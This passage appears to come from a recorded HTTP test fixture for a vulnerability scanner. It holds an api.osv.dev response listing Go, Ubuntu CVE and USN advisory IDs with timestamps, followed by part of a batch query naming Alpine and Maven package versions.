"GO-2023-1840", "modified": "2026-02-04T03:48:08.792378Z" }, { "id": "GO-2023-1878", "modified": "2026-02-04T04:31:14.443108Z" }, { "id": "GO-2023-1987", "modified": "2026-02-04T03:58:58.871084Z" }, { "id": "GO-2023-2041", "modified": "2026-02-04T04:25:22.510281Z" }, { "id": "GO-2023-2043", "modified": "2026-02-04T04:11:02.549923Z" }, { "id": "GO-2023-2102", "modified": "2026-02-04T03:49:27.289895Z" }, { "id": "GO-2023-2185", "modified": "2026-02-04T02:59:25.590966Z" }, { "id": "GO-2023-2186", "modified": "2026-02-04T03:56:59.969208Z" }, { "id": "GO-2023-2375", "modified": "2026-02-04T03:57:11.083315Z" }, { "id": "GO-2023-2382", "modified": "2026-02-04T03:33:11.274886Z" }, { "id": "GO-2024-2598", "modified": "2026-02-04T03:12:08.722840Z" }, { "id": "GO-2024-2599", "modified": "2026-02-04T02:21:09.533216Z" }, { "id": "GO-2024-2600", "modified": "2026-02-04T02:34:41.672789Z" }, { "id": "GO-2024-2609", "modified": "2026-02-04T04:37:13.773873Z" }, { "id": "GO-2024-2610", "modified": "2026-02-04T03:09:18.870079Z" }, { "id": "GO-2024-2687", "modified": "2026-02-04T04:09:31.762399Z" }, { "id": "GO-2024-2887", "modified": "2026-01-28T03:27:17.746525Z" }, { "id": "GO-2024-2888", "modified": "2026-01-28T03:27:17.560343Z" }, { "id": "GO-2024-2963", "modified": "2026-02-04T03:37:39.895574Z" }, { "id": "GO-2024-3105", "modified": "2026-02-24T16:29:04.364011Z" }, { "id": "GO-2024-3106", "modified": "2026-02-24T16:29:04.606789Z" }, { "id": "GO-2024-3107", "modified": "2026-02-24T16:29:04.677030Z" }, { "id": "GO-2025-3373", "modified": "2026-02-17T16:13:53.362266Z" }, { "id": "GO-2025-3420", "modified": "2026-02-17T16:13:53.083304Z" }, { "id": "GO-2025-3447", "modified": "2026-02-04T04:23:04.020664Z" }, { "id": "GO-2025-3563", "modified": "2026-02-17T16:13:52.395126Z" }, { "id": "GO-2025-3750", "modified": "2026-02-04T03:28:12.135241Z" }, { "id": "GO-2025-3751", "modified": "2026-02-17T16:13:52.185280Z" }, { "id": "GO-2025-3849", "modified": "2026-02-04T02:26:50.866679Z" }, { "id": "GO-2025-3956", "modified": "2026-02-04T04:33:27.340869Z" }, { "id": "GO-2025-4006", "modified": "2026-02-17T16:13:53.018755Z" }, { "id": "GO-2025-4007", "modified": "2026-02-17T13:58:48.676604Z" }, { "id": "GO-2025-4008", "modified": "2026-02-17T13:58:48.077685Z" }, { "id": "GO-2025-4009", "modified": "2026-02-13T02:58:48.571208Z" }, { "id": "GO-2025-4010", "modified": "2026-02-13T21:28:48.362505Z" }, { "id": "GO-2025-4011", "modified": "2026-02-17T13:58:47.352598Z" }, { "id": "GO-2025-4012", "modified": "2026-02-17T13:58:47.721658Z" }, { "id": "GO-2025-4013", "modified": "2026-02-17T13:58:47.501939Z" }, { "id": "GO-2025-4014", "modified": "2026-03-18T11:44:08.816200Z" }, { "id": "GO-2025-4015", "modified": "2026-02-17T16:13:53.510662Z" }, { "id": "GO-2025-4155", "modified": "2026-03-18T11:44:08.473909Z" }, { "id": "GO-2025-4175", "modified": "2026-02-04T04:38:59.126121Z" }, { "id": "GO-2026-4337", "modified": "2026-03-18T11:44:08.657377Z" }, { "id": "GO-2026-4340", "modified": "2026-02-04T02:58:11.702669Z" }, { "id": "GO-2026-4341", "modified": "2026-03-18T11:44:08.749079Z" }, { "id": "GO-2026-4342", "modified": "2026-03-17T10:28:56.226379Z" }, { "id": "GO-2026-4403", "modified": "2026-02-06T09:40:56.765821Z" }, { "id": "GO-2026-4601", "modified": "2026-03-10T10:43:54.660319Z" }, { "id": "GO-2026-4602", "modified": "2026-03-10T10:43:54.463365Z" }, { "id": "GO-2026-4603", "modified": "2026-03-10T10:43:54.330461Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2022-3219", "modified": "2026-01-20T17:26:42.776809Z" }, { "id": "UBUNTU-CVE-2025-30258", "modified": "2026-02-04T04:30:17.426918Z" }, { "id": "UBUNTU-CVE-2025-68972", "modified": "2026-01-20T19:15:15.770361Z" }, { "id": "UBUNTU-CVE-2025-68973", "modified": "2026-02-05T00:30:28.335358Z" }, { "id": "USN-7412-1", "modified": "2026-02-10T04:47:47Z" }, { "id": "USN-7412-2", "modified": "2026-02-10T04:47:47Z" }, { "id": "USN-7946-1", "modified": "2026-02-10T04:50:47Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2016-20013", "modified": "2026-02-03T07:12:11.178156Z" }, { "id": "UBUNTU-CVE-2025-0395", "modified": "2026-02-06T21:35:29.229625Z" }, { "id": "UBUNTU-CVE-2025-15281", "modified": "2026-02-04T07:39:07.958164Z" }, { "id": "UBUNTU-CVE-2025-4802", "modified": "2026-02-04T04:09:49.871743Z" }, { "id": "UBUNTU-CVE-2025-8058", "modified": "2026-02-04T07:39:09.389770Z" }, { "id": "UBUNTU-CVE-2026-0861", "modified": "2026-02-04T07:39:03.415441Z" }, { "id": "UBUNTU-CVE-2026-0915", "modified": "2026-02-23T00:02:27.504192Z" }, { "id": "USN-7259-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7541-1", "modified": "2026-02-10T04:48:59Z" }, { "id": "USN-7760-1", "modified": "2026-02-10T04:49:49Z" }, { "id": "USN-8005-1", "modified": "2026-02-23T00:13:53.339268Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2016-20013", "modified": "2026-02-03T07:12:11.178156Z" }, { "id": "UBUNTU-CVE-2025-0395", "modified": "2026-02-06T21:35:29.229625Z" }, { "id": "UBUNTU-CVE-2025-15281", "modified": "2026-02-04T07:39:07.958164Z" }, { "id": "UBUNTU-CVE-2025-4802", "modified": "2026-02-04T04:09:49.871743Z" }, { "id": "UBUNTU-CVE-2025-8058", "modified": "2026-02-04T07:39:09.389770Z" }, { "id": "UBUNTU-CVE-2026-0861", "modified": "2026-02-04T07:39:03.415441Z" }, { "id": "UBUNTU-CVE-2026-0915", "modified": "2026-02-23T00:02:27.504192Z" }, { "id": "USN-7259-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7541-1", "modified": "2026-02-10T04:48:59Z" }, { "id": "USN-7760-1", "modified": "2026-02-10T04:49:49Z" }, { "id": "USN-8005-1", "modified": "2026-02-23T00:13:53.339268Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2025-1390", "modified": "2026-02-04T04:28:50.933288Z" }, { "id": "USN-7287-1", "modified": "2026-02-10T04:47:15Z" } ] }, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2022-27943", "modified": "2026-02-25T19:00:26.332370Z" }, { "id": "UBUNTU-CVE-2023-4039", "modified": "2026-03-14T09:09:23.235151Z" }, { "id": "USN-7700-1", "modified": "2026-02-10T04:49:46Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2024-2236", "modified": "2026-01-20T17:51:42.649938Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2024-12243", "modified": "2026-02-04T02:53:36.843010Z" }, { "id": "UBUNTU-CVE-2025-14831", "modified": "2026-02-28T05:58:56.935176Z" }, { "id": "UBUNTU-CVE-2025-32988", "modified": "2026-02-04T02:15:37.273955Z" }, { "id": "UBUNTU-CVE-2025-32989", "modified": "2026-02-04T03:37:18.739300Z" }, { "id": "UBUNTU-CVE-2025-32990", "modified": "2026-02-04T03:31:01.615385Z" }, { "id": "UBUNTU-CVE-2025-6395", "modified": "2026-02-04T03:31:22.603031Z" }, { "id": "UBUNTU-CVE-2025-9820", "modified": "2026-02-28T06:16:45.816014Z" }, { "id": "USN-7281-1", "modified": "2026-02-10T04:47:15Z" }, { "id": "USN-7635-1", "modified": "2026-02-10T04:49:34Z" }, { "id": "USN-8043-1", "modified": "2026-02-17T22:00:37.652199Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2018-5709", "modified": "2025-10-24T04:46:51Z" }, { "id": "UBUNTU-CVE-2024-26458", "modified": "2026-02-04T03:00:45.815615Z" }, { "id": "UBUNTU-CVE-2024-26461", "modified": "2026-02-04T04:19:35.724133Z" }, { "id": "UBUNTU-CVE-2024-3596", "modified": "2026-02-04T04:28:06.065165Z" }, { "id": "UBUNTU-CVE-2025-24528", "modified": "2026-02-04T04:40:58.959893Z" }, { "id": "UBUNTU-CVE-2025-3576", "modified": "2026-02-04T02:50:47.063994Z" }, { "id": "USN-7257-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7314-1", "modified": "2026-02-10T04:47:17Z" }, { "id": "USN-7542-1", "modified": "2026-02-10T04:48:59Z" } ] }, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2018-5709", "modified": "2025-10-24T04:46:51Z" }, { "id": "UBUNTU-CVE-2024-26458", "modified": "2026-02-04T03:00:45.815615Z" }, { "id": "UBUNTU-CVE-2024-26461", "modified": "2026-02-04T04:19:35.724133Z" }, { "id": "UBUNTU-CVE-2024-3596", "modified": "2026-02-04T04:28:06.065165Z" }, { "id": "UBUNTU-CVE-2025-24528", "modified": "2026-02-04T04:40:58.959893Z" }, { "id": "UBUNTU-CVE-2025-3576", "modified": "2026-02-04T02:50:47.063994Z" }, { "id": "USN-7257-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7314-1", "modified": "2026-02-10T04:47:17Z" }, { "id": "USN-7542-1", "modified": "2026-02-10T04:48:59Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2018-5709", "modified": "2025-10-24T04:46:51Z" }, { "id": "UBUNTU-CVE-2024-26458", "modified": "2026-02-04T03:00:45.815615Z" }, { "id": "UBUNTU-CVE-2024-26461", "modified": "2026-02-04T04:19:35.724133Z" }, { "id": "UBUNTU-CVE-2024-3596", "modified": "2026-02-04T04:28:06.065165Z" }, { "id": "UBUNTU-CVE-2025-24528", "modified": "2026-02-04T04:40:58.959893Z" }, { "id": "UBUNTU-CVE-2025-3576", "modified": "2026-02-04T02:50:47.063994Z" }, { "id": "USN-7257-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7314-1", "modified": "2026-02-10T04:47:17Z" }, { "id": "USN-7542-1", "modified": "2026-02-10T04:48:59Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2018-5709", "modified": "2025-10-24T04:46:51Z" }, { "id": "UBUNTU-CVE-2024-26458", "modified": "2026-02-04T03:00:45.815615Z" }, { "id": "UBUNTU-CVE-2024-26461", "modified": "2026-02-04T04:19:35.724133Z" }, { "id": "UBUNTU-CVE-2024-3596", "modified": "2026-02-04T04:28:06.065165Z" }, { "id": "UBUNTU-CVE-2025-24528", "modified": "2026-02-04T04:40:58.959893Z" }, { "id": "UBUNTU-CVE-2025-3576", "modified": "2026-02-04T02:50:47.063994Z" }, { "id": "USN-7257-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7314-1", "modified": "2026-02-10T04:47:17Z" }, { "id": "USN-7542-1", "modified": "2026-02-10T04:48:59Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2025-62813", "modified": "2025-10-27T08:32:45.494712Z" } ] }, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-50495", "modified": "2026-02-04T03:21:31.661318Z" }, { "id": "UBUNTU-CVE-2025-6141", "modified": "2026-01-20T18:35:03.980742Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-50495", "modified": "2026-02-04T03:21:31.661318Z" }, { "id": "UBUNTU-CVE-2025-6141", "modified": "2026-01-20T18:35:03.980742Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2024-10041", "modified": "2026-01-20T19:07:32.667161Z" }, { "id": "UBUNTU-CVE-2025-6020", "modified": "2026-02-04T02:31:29.332885Z" }, { "id": "UBUNTU-CVE-2025-8941", "modified": "2026-01-20T18:46:31.526274Z" }, { "id": "USN-7580-1", "modified": "2026-02-10T04:49:00Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2024-10041", "modified": "2026-01-20T19:07:32.667161Z" }, { "id": "UBUNTU-CVE-2025-6020", "modified": "2026-02-04T02:31:29.332885Z" }, { "id": "UBUNTU-CVE-2025-8941", "modified": "2026-01-20T18:46:31.526274Z" }, { "id": "USN-7580-1", "modified": "2026-02-10T04:49:00Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2024-10041", "modified": "2026-01-20T19:07:32.667161Z" }, { "id": "UBUNTU-CVE-2025-6020", "modified": "2026-02-04T02:31:29.332885Z" }, { "id": "UBUNTU-CVE-2025-8941", "modified": "2026-01-20T18:46:31.526274Z" }, { "id": "USN-7580-1", "modified": "2026-02-10T04:49:00Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2024-10041", "modified": "2026-01-20T19:07:32.667161Z" }, { "id": "UBUNTU-CVE-2025-6020", "modified": "2026-02-04T02:31:29.332885Z" }, { "id": "UBUNTU-CVE-2025-8941", "modified": "2026-01-20T18:46:31.526274Z" }, { "id": "USN-7580-1", "modified": "2026-02-10T04:49:00Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2022-41409", "modified": "2025-10-24T04:53:52Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2017-11164", "modified": "2026-01-20T16:49:00.053545Z" } ] }, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2024-13176", "modified": "2026-03-09T11:29:11.736076Z" }, { "id": "UBUNTU-CVE-2024-41996", "modified": "2026-02-06T21:00:29.439853Z" }, { "id": "UBUNTU-CVE-2024-9143", "modified": "2026-03-09T11:29:50.088989Z" }, { "id": "UBUNTU-CVE-2025-15467", "modified": "2026-03-05T18:42:43.606385Z" }, { "id": "UBUNTU-CVE-2025-27587", "modified": "2026-02-06T21:55:03.879396Z" }, { "id": "UBUNTU-CVE-2025-68160", "modified": "2026-02-12T06:59:44.011039Z" }, { "id": "UBUNTU-CVE-2025-69418", "modified": "2026-02-06T22:01:44.179826Z" }, { "id": "UBUNTU-CVE-2025-69419", "modified": "2026-02-12T06:59:40.921557Z" }, { "id": "UBUNTU-CVE-2025-69420", "modified": "2026-02-12T06:58:38.833674Z" }, { "id": "UBUNTU-CVE-2025-69421", "modified": "2026-03-02T12:02:19.670699Z" }, { "id": "UBUNTU-CVE-2025-9230", "modified": "2026-03-09T12:25:45.048270Z" }, { "id": "UBUNTU-CVE-2026-22795", "modified": "2026-02-12T06:58:35.942634Z" }, { "id": "UBUNTU-CVE-2026-22796", "modified": "2026-02-12T06:59:02.005868Z" }, { "id": "UBUNTU-CVE-2026-2673", "modified": "2026-03-18T08:04:38.900604Z" }, { "id": "USN-7278-1", "modified": "2026-02-10T04:47:15Z" }, { "id": "USN-7786-1", "modified": "2026-02-10T04:50:09Z" }, { "id": "USN-7980-1", "modified": "2026-03-02T11:56:15.392710Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2022-27943", "modified": "2026-02-25T19:00:26.332370Z" }, { "id": "UBUNTU-CVE-2023-4039", "modified": "2026-03-14T09:09:23.235151Z" }, { "id": "USN-7700-1", "modified": "2026-02-10T04:49:46Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-7008", "modified": "2025-10-09T04:59:16Z" }, { "id": "UBUNTU-CVE-2025-4598", "modified": "2026-02-04T02:49:04.264249Z" }, { "id": "UBUNTU-CVE-2026-4105", "modified": "2026-03-18T08:05:12.098241Z" }, { "id": "USN-7559-1", "modified": "2026-02-10T04:48:59Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2021-46848", "modified": "2026-02-12T06:44:04.921097Z" }, { "id": "UBUNTU-CVE-2024-12133", "modified": "2026-02-12T06:31:24.332995Z" }, { "id": "UBUNTU-CVE-2025-13151", "modified": "2026-02-12T06:43:59.770392Z" }, { "id": "USN-7275-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7954-1", "modified": "2026-02-10T04:50:47Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-50495", "modified": "2026-02-04T03:21:31.661318Z" }, { "id": "UBUNTU-CVE-2025-6141", "modified": "2026-01-20T18:35:03.980742Z" } ] }, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2023-7008", "modified": "2025-10-09T04:59:16Z" }, { "id": "UBUNTU-CVE-2025-4598", "modified": "2026-02-04T02:49:04.264249Z" }, { "id": "UBUNTU-CVE-2026-4105", "modified": "2026-03-18T08:05:12.098241Z" }, { "id": "USN-7559-1", "modified": "2026-02-10T04:48:59Z" } ] }, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2022-4899", "modified": "2025-09-08T16:49:53Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-29383", "modified": "2025-10-24T05:01:54Z" }, { "id": "UBUNTU-CVE-2024-56433", "modified": "2026-01-20T18:02:13.226633Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-50495", "modified": "2026-02-04T03:21:31.661318Z" }, { "id": "UBUNTU-CVE-2025-6141", "modified": "2026-01-20T18:35:03.980742Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-50495", "modified": "2026-02-04T03:21:31.661318Z" }, { "id": "UBUNTU-CVE-2025-6141", "modified": "2026-01-20T18:35:03.980742Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-29383", "modified": "2025-10-24T05:01:54Z" }, { "id": "UBUNTU-CVE-2024-56433", "modified": "2026-01-20T18:02:13.226633Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-31486", "modified": "2025-10-24T05:01:58Z" }, { "id": "UBUNTU-CVE-2023-47039", "modified": "2025-10-24T05:02:19Z" }, { "id": "UBUNTU-CVE-2024-56406", "modified": "2026-02-04T02:50:55.689079Z" }, { "id": "UBUNTU-CVE-2025-40909", "modified": "2026-02-04T02:15:05.324531Z" }, { "id": "USN-7434-1", "modified": "2026-02-10T04:47:48Z" }, { "id": "USN-7678-1", "modified": "2026-02-10T04:49:41Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2025-45582", "modified": "2026-01-20T18:59:29.811906Z" } ] }, {}, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2026-27171", "modified": "2026-02-27T09:59:13Z" } ] } ] } headers: Content-Length: - "17153" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 29320 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine:v3.21", "name": "acl" }, "version": "2.3.2-r1" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "alpine-baselayout" }, "version": "3.6.8-r1" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "alpine-baselayout" }, "version": "3.6.8-r1" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "alpine-keys" }, "version": "2.5-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "alpine-base" }, "version": "3.21.2-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "apk-tools" }, "version": "2.14.6-r2" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "brotli" }, "version": "1.1.0-r2" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "busybox" }, "version": "1.37.0-r9" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "busybox" }, "version": "1.37.0-r9" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "ca-certificates" }, "version": "20241121-r1" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "ca-certificates" }, "version": "20241121-r1" }, { "package": { "ecosystem": "Maven", "name": "ch.qos.reload4j:reload4j" }, "version": "1.2.22" }, { "package": { "ecosystem": "Maven", "name": "com.fasterxml.jackson.core:jackson-annotations" }, "version": "2.12.7" }, { "package": { "ecosystem": "Maven", "name": "com.fasterxml.jackson.core:jackson-core" }, "version": "2.10.2" }, { "package": { "ecosystem": "Maven", "name": "com.fasterxml.jackson.core:jackson-databind" }, "version": "2.12.7.1" }, { "package": { "ecosystem": "Maven", "name": "com.fasterxml.jackson.jaxrs:jackson-jaxrs-base" }, "version": "2.12.7" }, { "package": { "ecosystem": "Maven", "name": "com.fasterxml.jackson.jaxrs:jackson-jaxrs-json-provider" }, "version": "2.12.7" }, { "package": { "ecosystem": "Maven", "name": "com.fasterxml.jackson.module:jackson-module-jaxb-annotations" }, "version": "2.12.7" }, { "package": { "ecosystem": "Maven", "name": "com.fasterxml.woodstox:woodstox-core" }, "version": "5.4.0" }, { "package": { "ecosystem": "Maven", "name": "com.github.stephenc.jcip:jcip-annotations" }, "version": "1.0-1" }, { "package": { "ecosystem": "Maven", "name": "com.google.code.findbugs:jsr305" }, "version": "3.0.2" }, { "package": { "ecosystem": "Maven", "name": "com.google.code.gson:gson" }, "version": "2.9.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.errorprone:error_prone_annotations" }, "version": "2.18.0" }, { "package": { "ecosystem": "Maven", "name": "com.google.guava:failureaccess" }, "version": "1.0.1" }, { "package": { "ecosystem": "Maven", "name": "com.google.guava:guava" }, "version": "32.0.1-jre" }, { "package": { "ecosystem": "Maven", "name": "com.google.guava:listenablefuture" }, "version": "9999.0-empty-to-avoid-conflict-with-guava" }, { "package": { "ecosystem": "Maven", "name": "com.google.j2objc:j2objc-annotations" }, "version": "2.8" }, { "package": { "ecosystem": "Maven", "name": "com.google.protobuf:protobuf-java" }, "version": "3.21.12" }, { "package": { "ecosystem": "Maven", "name": "com.google.re2j:re2j" }, "version": "1.1" }, { "package": { "ecosystem": "Maven", "name": "com.nimbusds:nimbus-jose-jwt" }, "version": "9.31" }, { "package": { "ecosystem": "Maven", "name": "com.sun.jersey:jersey-client" }, "version": "1.19.4" }, { "package": { "ecosystem": "Maven", "name": "com.sun.jersey:jersey-core" }, "version": "1.19.4" }, { "package": { "ecosystem": "Maven", "name": "com.sun.jersey:jersey-servlet" }, "version": "1.19.4" }, { "package": { "ecosystem": "Maven", "name": "commons-beanutils:commons-beanutils" }, "version": "1.9.4" }, { "package": { "ecosystem": "Maven", "name": "commons-cli:commons-cli" }, "version": "1.5.0" }, { "package": { "ecosystem": "Maven", "name": "commons-codec:commons-codec" }, "version": "1.15" }, { "package": { "ecosystem": "Maven", "name": "commons-collections:commons-collections" }, "version": "3.2.2" }, { "package": { "ecosystem": "Maven", "name": "commons-io:commons-io" }, "version": "2.14.0" }, { "package": { "ecosystem": "Maven", "name": "commons-logging:commons-logging" }, "version": "1.2" }, { "package": { "ecosystem": "Maven", "name": "commons-net:commons-net" }, "version": "3.9.0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "coreutils" }, "version": "9.5-r2" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "coreutils" }, "version": "9.5-r2" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "coreutils" }, "version": "9.5-r2" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "coreutils" }, "version": "9.5-r2" }, { "package": { "ecosystem": "Maven", "name": "dnsjava:dnsjava" }, "version": "3.4.0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "encodings" }, "version": "1.0.7-r1" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "font-dejavu" }, "version": "2.37-r5" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "fontconfig" }, "version": "2.15.0-r1" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "freetype" }, "version": "2.13.3-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "gdbm" }, "version": "1.24-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "gmp" }, "version": "6.3.0-r2" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "gnupg" }, "version": "2.4.7-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "gnupg" }, "version": "2.4.7-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "gnupg" }, "version": "2.4.7-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "gnupg" }, "version": "2.4.7-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "gnupg" }, "version": "2.4.7-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "gnupg" }, "version": "2.4.7-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "gnutls" }, "version": "3.8.8-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "gnupg" }, "version": "2.4.7-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "gnupg" }, "version": "2.4.7-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "gnupg" }, "version": "2.4.7-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "gnupg" }, "version": "2.4.7-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "gnupg" }, "version": "2.4.7-r0" }, { "package": { "ecosystem": "Maven", "name": "io.dropwizard.metrics:metrics-core" }, "version": "3.2.4" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-all" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-buffer" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-codec" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-codec-dns" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-codec-haproxy" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-codec-http" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-codec-http2" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-codec-memcache" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-codec-mqtt" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-codec-redis" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-codec-smtp" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-codec-socks" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-codec-stomp" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-codec-xml" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-common" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-handler" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-handler-proxy" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-handler-ssl-ocsp" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-resolver" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-resolver-dns" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-resolver-dns-classes-macos" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-resolver-dns-native-macos" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-transport" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-transport-classes-epoll" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-transport-classes-kqueue" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-transport-native-epoll" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-transport-native-kqueue" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-transport-native-unix-common" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-transport-rxtx" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-transport-sctp" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "io.netty:netty-transport-udt" }, "version": "4.1.100.Final" }, { "package": { "ecosystem": "Maven", "name": "jakarta.activation:jakarta.activation-api" }, "version": "1.2.1" }, { "package": { "ecosystem": "Maven", "name": "jakarta.xml.bind:jakarta.xml.bind-api" }, "version": "2.3.2" }, { "package": { "ecosystem": "Maven", "name": "javax.servlet:javax.servlet-api" }, "version": "3.1.0" }, { "package": { "ecosystem": "Maven", "name": "javax.ws.rs:jsr311-api" }, "version": "1.1.1" }, { "package": { "ecosystem": "Maven", "name": "javax.xml.bind:jaxb-api" }, "version": "2.2.11" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "libassuan" }, "version": "2.5.7-r0" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "attr" }, "version": "2.5.2-r2" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "bzip2" }, "version": "1.0.8-r6" }, { "package": { "ecosystem": "Alpine:v3.21", "name": "openssl" }, "version": "3.3.2-r4" }, { "package": { "ecosystem": 